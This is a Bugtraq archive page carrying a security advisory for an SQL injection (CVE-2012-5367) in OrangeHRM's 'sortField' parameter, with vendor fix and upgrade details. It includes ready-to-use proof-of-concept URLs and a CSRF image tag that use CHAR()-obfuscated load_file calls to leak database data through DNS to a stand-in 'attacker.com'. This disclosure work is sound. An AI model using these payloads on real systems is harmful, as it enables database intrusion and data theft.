[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL Injection Vulnerability in OrangeHRM

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL Injection Vulnerability in OrangeHRM
From: advisory@xxxxxxxxxxxx
Date: Mon, 5 Nov 2012 15:31:12 +0100 (CET)

Advisory ID: HTB23119
Product: OrangeHRM
Vendor: OrangeHRM Inc.
Vulnerable Version(s): 2.7.1-rc.1 and probably prior
Tested Version: 2.7.1-rc.1
Vendor Notification: October 10, 2012 
Public Disclosure: October 31, 2012 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-5367
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability 
in OrangeHRM, which could be exploited to alter SQL requests to application's 
database. 


1) SQL Injection Vulnerability in Orange HRM: CVE-2012-5367

The vulnerability was discovered in the "/symfony/web/index.php" script while 
handling the "sortField" HTTP GET parameter. 

Successful exploitation of this vulnerability requires administrative 
privileges, however it can be exploited by a non-authenticated user via CSRF 
vector, as the above-mentioned script is also vulnerable to CSRF attack. 

The vulnerability could be triggered by accessing the following URIs:
 
/symfony/web/index.php/admin/viewCustomers
/symfony/web/index.php/admin/viewPayGrades 
/symfony/web/index.php/admin/viewPayGrades


The PoC codes below are based on DNS Exfiltration technique and can be used in 
cases when application's database is hosted on a Windows system. The PoCs will 
send a DNS request demanding IP addess for `version()` (or any other sensitive 
information from the database) subdomain of ".attacker.com" (a domain name, DNS 
server of which is controlled by the attacker):


1.1 
http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select
 load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))


The following PoC demonstrates exploitation of the vulnerability via CSRF 
vector:


<img 
src="http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select
 load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))">



1.2 
http://[host]/symfony/web/index.php/admin/viewPayGrades?sortOrder=ASC&sortField=(select
 load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))

1.3 
http://[host]/symfony/web/index.php/admin/viewSystemUsers?sortOrder=ASC&sortField=(select
 load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to OrangeHRM 2.7.1
http://www.orangehrm.com/download.php

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23119 - 
https://www.htbridge.com/advisory/HTB23119 - SQL Injection Vulnerability in 
Orange HRM.
[2] OrangeHRM - http://www.orangehrm.com - OrangeHRM is the world’s most 
popular Open Source Human Resource Management Software (HRMS) with over 
1,000,000 users globally.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

Prev by Date: Multiple Vulnerabilities in LibreOffice
Next by Date: multiple critical vulnerabilities in sophos products
Previous by thread: Multiple Vulnerabilities in LibreOffice
Next by thread: multiple critical vulnerabilities in sophos products
Index(es):
- Date
- Thread